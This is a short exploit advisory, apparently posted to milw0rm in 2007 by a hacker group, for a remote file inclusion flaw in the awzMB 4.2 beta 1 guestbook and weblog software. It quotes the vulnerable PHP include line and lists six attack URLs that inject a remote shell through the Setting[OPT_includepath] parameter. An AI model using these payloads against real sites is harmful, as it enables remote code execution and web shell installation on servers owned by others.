\\\|/// \\ - - // Xmors Underground Group ( @ @ ) ----oOOo--(_)-oOOo-------------------------------------------------- Portal : awzMB system Version 4.2 beta 1 Guestbook/Weblog/Contact Download : http://downloads.sourceforge.net/awzmb/awzmb_4.2_beta1.zip Author : S.W.A.T. HomePage : wWw.XmorS.CoM Type : Remote File Inclusion Y! ID : Svvateam E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com OurForum : http://svvat.3host.biz/forum/index.php Dork : Copyright © 2001-2007 awzMB Project ----ooooO-----Ooooo-------------------------------------------------- ( ) ( ) \ ( ) / \_) (_/ +---------------------------------------------------------------------------------------------+ Vuln Code : if (!isset($Setting[OPT_includepath])) $Setting[OPT_includepath] = ''; include_once($Setting[OPT_includepath].'awzmb/modules/core/core.incl.php'); +---------------------------------------------------------------------------------------------+ +---------------------------------------------------------------------------------------------+ Exploit : http://[TARGET]/[PATH]/awzmb/adminhelp.php?Setting[OPT_includepath]=[-Sh3ll-] http://[TARGET]/[PATH]/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=[-Sh3ll-] http://[TARGET]/[PATH]/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=[-Sh3ll-] http://[TARGET]/[PATH]/awzmb/modules/help.incl.php?Setting[OPT_includepath]=[-Sh3ll-] http://[TARGET]/[PATH]/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=[-Sh3ll-] http://[TARGET]/[PATH]/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=[-Sh3ll-] +---------------------------------------------------------------------------------------------+ # milw0rm.com [2007-10-18]